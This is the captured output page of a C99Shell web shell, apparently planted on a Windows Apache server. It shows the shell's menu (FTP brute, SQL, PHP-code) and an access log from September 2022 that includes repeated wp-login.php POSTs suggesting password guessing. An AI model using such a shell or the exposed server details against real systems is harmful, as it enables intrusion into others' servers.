!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\apache\logs\   drwxrwxrwx
Free 9.41 GB of 239.26 GB (3.93%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     access.2022.09.18.log (486.87 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
66.249.73.97 - - [18/Sep/2022:00:00:33 -0500] "-" 408 -
216.245.221.92 - - [18/Sep/2022:00:00:42 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [17/Sep/2022:23:59:31 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [18/Sep/2022:00:01:48 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisT-606-15.docx HTTP/1.1" 200 26698
172.22.2.4 - - [18/Sep/2022:00:01:49 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [18/Sep/2022:00:01:49 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120.png HTTP/1.1" 404 1140
172.22.2.4 - - [18/Sep/2022:00:01:49 -0500] "GET /BLA/boletinlegal/apple-touch-icon-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [18/Sep/2022:00:01:49 -0500] "GET /BLA/boletinlegal/apple-touch-icon.png HTTP/1.1" 404 1140
172.22.2.4 - - [18/Sep/2022:00:01:49 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1140
172.22.2.4 - - [18/Sep/2022:00:01:49 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [18/Sep/2022:00:01:49 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120.png HTTP/1.1" 404 1140
172.22.2.4 - - [18/Sep/2022:00:01:49 -0500] "GET /BLA/boletinlegal/apple-touch-icon-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [18/Sep/2022:00:01:49 -0500] "GET /BLA/boletinlegal/apple-touch-icon.png HTTP/1.1" 404 1140
172.22.2.4 - - [18/Sep/2022:00:01:49 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1140
172.22.2.4 - - [18/Sep/2022:00:00:21 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
201.245.192.253 - - [18/Sep/2022:00:03:51 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
216.245.221.92 - - [18/Sep/2022:00:05:42 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [18/Sep/2022:00:05:21 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [18/Sep/2022:00:06:11 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57725
201.245.192.253 - - [18/Sep/2022:00:08:50 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
136.243.228.197 - - [18/Sep/2022:00:09:18 -0500] "GET / HTTP/1.1" 200 319
184.73.99.196 - - [18/Sep/2022:00:10:25 -0500] "GET /portaldeninos/wp-content/uploads/2020/01/Tierra-escenario.jpg HTTP/1.1" 200 181491
216.245.221.92 - - [18/Sep/2022:00:10:42 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [18/Sep/2022:00:12:11 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9559
201.245.192.253 - - [18/Sep/2022:00:12:16 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/listarProyecto.xhtml HTTP/1.1" 200 163
201.245.192.253 - - [18/Sep/2022:00:12:17 -0500] "GET /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 89928
201.245.192.253 - - [18/Sep/2022:00:12:19 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.192.253 - - [18/Sep/2022:00:12:19 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [18/Sep/2022:00:12:19 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [18/Sep/2022:00:12:19 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [18/Sep/2022:00:12:19 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [18/Sep/2022:00:12:19 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [18/Sep/2022:00:12:19 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [18/Sep/2022:00:12:19 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
201.245.192.253 - - [18/Sep/2022:00:12:19 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
201.245.192.253 - - [18/Sep/2022:00:12:19 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 3257
201.245.192.253 - - [18/Sep/2022:00:12:23 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 44835
201.245.192.253 - - [18/Sep/2022:00:12:25 -0500] "GET /sipse/faces/javax.faces.resource/spacer/dot_clear.gif?ln=primefaces&v=4.0 HTTP/1.1" 200 42
201.245.192.253 - - [18/Sep/2022:00:12:25 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 3945
172.22.2.4 - - [18/Sep/2022:00:11:11 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [18/Sep/2022:00:12:01 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
201.245.192.253 - - [18/Sep/2022:00:13:49 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
152.61.192.232 - - [18/Sep/2022:00:14:30 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [18/Sep/2022:00:15:38 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 72689
216.245.221.92 - - [18/Sep/2022:00:15:42 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [18/Sep/2022:00:16:06 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 186012
201.245.192.253 - - [18/Sep/2022:00:16:08 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [18/Sep/2022:00:16:08 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [18/Sep/2022:00:16:08 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [18/Sep/2022:00:16:08 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
95.108.213.20 - - [18/Sep/2022:00:16:51 -0500] "-" 408 -
5.255.253.178 - - [18/Sep/2022:00:16:56 -0500] "-" 408 -
87.250.224.64 - - [18/Sep/2022:00:17:02 -0500] "-" 408 -
87.250.224.90 - - [18/Sep/2022:00:17:08 -0500] "-" 408 -
5.45.207.141 - - [18/Sep/2022:00:17:23 -0500] "-" 408 -
201.245.192.253 - - [18/Sep/2022:00:17:33 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/actividad/crearActividad.xhtml HTTP/1.1" 200 92693
201.245.192.253 - - [18/Sep/2022:00:17:35 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [18/Sep/2022:00:17:35 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [18/Sep/2022:00:17:35 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [18/Sep/2022:00:17:35 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [18/Sep/2022:00:17:35 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 3813
201.245.192.253 - - [18/Sep/2022:00:17:36 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 3813
87.250.224.6 - - [18/Sep/2022:00:17:38 -0500] "-" 408 -
201.245.192.253 - - [18/Sep/2022:00:17:59 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 178591
201.245.192.253 - - [18/Sep/2022:00:18:00 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [18/Sep/2022:00:18:00 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [18/Sep/2022:00:18:00 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [18/Sep/2022:00:18:00 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
87.250.224.3 - - [18/Sep/2022:00:18:08 -0500] "-" 408 -
201.245.192.253 - - [18/Sep/2022:00:18:14 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/actividad/crearActividad.xhtml HTTP/1.1" 200 92693
201.245.192.253 - - [18/Sep/2022:00:18:16 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [18/Sep/2022:00:18:16 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [18/Sep/2022:00:18:16 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [18/Sep/2022:00:18:16 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [18/Sep/2022:00:18:17 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 3813
201.245.192.253 - - [18/Sep/2022:00:18:18 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 3813
201.245.192.253 - - [18/Sep/2022:00:18:24 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 72585
172.22.2.4 - - [18/Sep/2022:00:17:01 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [18/Sep/2022:00:18:48 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
201.245.192.253 - - [18/Sep/2022:00:19:02 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 73330
87.250.224.191 - - [18/Sep/2022:00:19:08 -0500] "-" 408 -
172.22.2.4 - - [18/Sep/2022:00:19:09 -0500] "GET /BLA/boletinlegal/admin/config.php HTTP/1.1" 200 -
172.22.2.4 - - [18/Sep/2022:00:17:51 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52877
201.245.192.253 - - [18/Sep/2022:00:19:41 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41661
201.245.192.253 - - [18/Sep/2022:00:19:44 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42276
152.61.128.50 - - [18/Sep/2022:00:19:55 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [18/Sep/2022:00:19:56 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 73216
201.245.192.253 - - [18/Sep/2022:00:20:02 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 72793
87.250.224.41 - - [18/Sep/2022:00:20:08 -0500] "-" 408 -
185.119.81.104 - - [18/Sep/2022:00:20:22 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.104 - - [18/Sep/2022:00:20:23 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
201.245.192.253 - - [18/Sep/2022:00:20:34 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 27718
216.245.221.92 - - [18/Sep/2022:00:20:42 -0500] "HEAD / HTTP/1.1" 200 -
95.108.213.9 - - [18/Sep/2022:00:23:31 -0500] "-" 408 -
201.245.192.253 - - [18/Sep/2022:00:23:47 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
172.22.2.4 - - [18/Sep/2022:00:22:51 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [18/Sep/2022:00:23:41 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53290
216.245.221.92 - - [18/Sep/2022:00:25:42 -0500] "HEAD / HTTP/1.1" 200 -
87.250.224.39 - - [18/Sep/2022:00:26:51 -0500] "-" 408 -
157.55.39.202 - - [18/Sep/2022:00:27:33 -0500] "GET /transparencia/financiera/Ejecucion%20Presupuestal/Vigencia%20actual/4.%20EJECUCION%20DE%20VIGENCIAS%20ABRIL%202022.xlsx HTTP/1.1" 200 117516
201.245.192.253 - - [18/Sep/2022:00:28:46 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
201.245.192.253 - - [18/Sep/2022:00:29:40 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41661
201.245.192.253 - - [18/Sep/2022:00:29:44 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42276
157.55.39.200 - - [18/Sep/2022:00:30:03 -0500] "GET /BLA/resoluciones/AUTOS%202021/3359.pdf HTTP/1.1" 304 -
172.22.2.4 - - [18/Sep/2022:00:28:41 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [18/Sep/2022:00:30:42 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [18/Sep/2022:00:29:31 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
87.250.224.82 - - [18/Sep/2022:00:31:51 -0500] "-" 408 -
172.22.2.4 - - [18/Sep/2022:00:32:15 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/CUADRO%20SENTENCIA%20C-245%20DE%202004.doc HTTP/1.1" 304 -
201.245.192.253 - - [18/Sep/2022:00:33:45 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
185.119.81.102 - - [18/Sep/2022:00:35:29 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.102 - - [18/Sep/2022:00:35:30 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3650
216.245.221.92 - - [18/Sep/2022:00:35:42 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [18/Sep/2022:00:34:31 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [18/Sep/2022:00:35:21 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52877
157.55.39.188 - - [18/Sep/2022:00:38:00 -0500] "GET /forest/ HTTP/1.1" 200 12041
201.245.192.253 - - [18/Sep/2022:00:38:44 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
201.245.192.253 - - [18/Sep/2022:00:39:41 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41661
201.245.192.253 - - [18/Sep/2022:00:39:45 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42276
87.250.224.107 - - [18/Sep/2022:00:39:51 -0500] "-" 408 -
192.133.77.15 - - [18/Sep/2022:00:40:39 -0500] "-" 408 -
192.133.77.17 - - [18/Sep/2022:00:40:40 -0500] "-" 408 -
216.245.221.92 - - [18/Sep/2022:00:40:42 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [18/Sep/2022:00:40:21 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [18/Sep/2022:00:42:15 -0500] "GET /BLA/boletinlegal/Circulares/2022/CIRCULAR%20No.%2000004%20DEL%2019%20DE%20MAYO%20DEL%202022.pdf HTTP/1.1" 304 -
172.22.2.4 - - [18/Sep/2022:00:41:11 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
201.245.192.253 - - [18/Sep/2022:00:43:43 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
66.249.73.100 - - [18/Sep/2022:00:45:33 -0500] "-" 408 -
216.245.221.92 - - [18/Sep/2022:00:45:42 -0500] "HEAD / HTTP/1.1" 200 -
173.252.107.17 - - [18/Sep/2022:00:46:50 -0500] "GET /garza-azul-nueva-ave-registrada-en-el-humedal-el-burro.html HTTP/1.1" 206 890
172.22.2.4 - - [18/Sep/2022:00:46:11 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
185.119.81.102 - - [18/Sep/2022:00:48:28 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.102 - - [18/Sep/2022:00:48:29 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3650
172.22.2.4 - - [18/Sep/2022:00:47:01 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
201.245.192.253 - - [18/Sep/2022:00:48:42 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
216.245.221.92 - - [18/Sep/2022:00:50:42 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.201 - - [18/Sep/2022:00:51:36 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2895.pdf HTTP/1.1" 200 431819
5.255.231.129 - - [18/Sep/2022:00:51:37 -0500] "-" 408 -
45.76.176.157 - - [18/Sep/2022:00:52:45 -0500] "GET /galeria/galeria/fotos/diaSC3Peq.jpg HTTP/1.1" 200 24913
66.249.73.127 - - [18/Sep/2022:00:53:31 -0500] "-" 408 -
172.22.2.4 - - [18/Sep/2022:00:52:01 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [18/Sep/2022:00:53:41 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
172.22.2.4 - - [18/Sep/2022:00:52:52 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60281
216.245.221.92 - - [18/Sep/2022:00:55:42 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [18/Sep/2022:00:56:06 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [18/Sep/2022:00:56:07 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 63207
152.61.192.232 - - [18/Sep/2022:00:57:53 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
152.61.192.232 - - [18/Sep/2022:00:57:54 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.192.232 - - [18/Sep/2022:00:57:54 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
201.245.192.253 - - [18/Sep/2022:00:58:40 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
66.249.73.127 - - [18/Sep/2022:00:59:11 -0500] "-" 408 -
172.22.2.4 - - [18/Sep/2022:00:57:51 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [18/Sep/2022:00:58:41 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
216.245.221.92 - - [18/Sep/2022:01:00:42 -0500] "HEAD / HTTP/1.1" 200 -
5.255.253.134 - - [18/Sep/2022:01:02:55 -0500] "-" 408 -
201.245.192.253 - - [18/Sep/2022:01:03:39 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
172.22.2.4 - - [18/Sep/2022:01:03:41 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.65.217 - - [18/Sep/2022:01:05:32 -0500] "-" 408 -
216.245.221.92 - - [18/Sep/2022:01:05:42 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.127 - - [18/Sep/2022:01:05:55 -0500] "-" 408 -
172.22.2.4 - - [18/Sep/2022:01:04:31 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54003
152.61.128.50 - - [18/Sep/2022:01:07:24 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
152.61.128.50 - - [18/Sep/2022:01:07:25 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.128.50 - - [18/Sep/2022:01:07:25 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
201.245.192.253 - - [18/Sep/2022:01:08:37 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
216.245.221.92 - - [18/Sep/2022:01:10:42 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [18/Sep/2022:01:09:30 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 50046
172.22.2.4 - - [18/Sep/2022:01:09:31 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.220.149.22 - - [18/Sep/2022:01:11:43 -0500] "GET /images/negocios-verdes-mayo-2022.jpg HTTP/1.1" 200 48000
66.249.73.127 - - [18/Sep/2022:01:11:46 -0500] "-" 408 -
172.22.2.4 - - [18/Sep/2022:01:10:21 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54823
157.55.39.201 - - [18/Sep/2022:01:12:48 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2895.pdf HTTP/1.1" 200 431819
95.108.213.62 - - [18/Sep/2022:01:12:55 -0500] "-" 408 -
201.245.192.253 - - [18/Sep/2022:01:13:03 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 84544
201.245.192.253 - - [18/Sep/2022:01:13:03 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [18/Sep/2022:01:13:03 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [18/Sep/2022:01:13:03 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [18/Sep/2022:01:13:03 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [18/Sep/2022:01:13:03 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/listarProyecto.xhtml HTTP/1.1" 200 77973
201.245.192.253 - - [18/Sep/2022:01:13:03 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/listarProyecto.xhtml HTTP/1.1" 200 77973
201.245.192.253 - - [18/Sep/2022:01:13:03 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/listarProyecto.xhtml HTTP/1.1" 200 77973
201.245.192.253 - - [18/Sep/2022:01:13:04 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/listarProyecto.xhtml HTTP/1.1" 200 77973
201.245.192.253 - - [18/Sep/2022:01:13:10 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/listarProyecto.xhtml HTTP/1.1" 200 163
201.245.192.253 - - [18/Sep/2022:01:13:11 -0500] "GET /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 91917
201.245.192.253 - - [18/Sep/2022:01:13:12 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.192.253 - - [18/Sep/2022:01:13:12 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [18/Sep/2022:01:13:12 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [18/Sep/2022:01:13:12 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [18/Sep/2022:01:13:12 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [18/Sep/2022:01:13:12 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [18/Sep/2022:01:13:12 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [18/Sep/2022:01:13:13 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
201.245.192.253 - - [18/Sep/2022:01:13:13 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
201.245.192.253 - - [18/Sep/2022:01:13:13 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 3257
201.245.192.253 - - [18/Sep/2022:01:13:23 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 43846
201.245.192.253 - - [18/Sep/2022:01:13:25 -0500] "GET /sipse/faces/javax.faces.resource/spacer/dot_clear.gif?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [18/Sep/2022:01:13:25 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 3942
201.245.192.253 - - [18/Sep/2022:01:13:37 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
216.245.221.92 - - [18/Sep/2022:01:15:42 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [18/Sep/2022:01:15:21 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [18/Sep/2022:01:16:11 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
201.245.192.253 - - [18/Sep/2022:01:18:36 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
201.245.192.253 - - [18/Sep/2022:01:19:41 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41653
201.245.192.253 - - [18/Sep/2022:01:19:46 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42604
185.119.81.102 - - [18/Sep/2022:01:20:28 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.102 - - [18/Sep/2022:01:20:28 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3650
216.245.221.92 - - [18/Sep/2022:01:20:42 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.86 - - [18/Sep/2022:01:20:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202000/2000%202800-2849.tif HTTP/1.1" 200 6618561
66.249.73.127 - - [18/Sep/2022:01:22:18 -0500] "-" 408 -
172.22.2.4 - - [18/Sep/2022:01:21:11 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
5.255.253.187 - - [18/Sep/2022:01:23:27 -0500] "-" 408 -
201.245.192.253 - - [18/Sep/2022:01:23:35 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
172.22.2.4 - - [18/Sep/2022:01:22:01 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
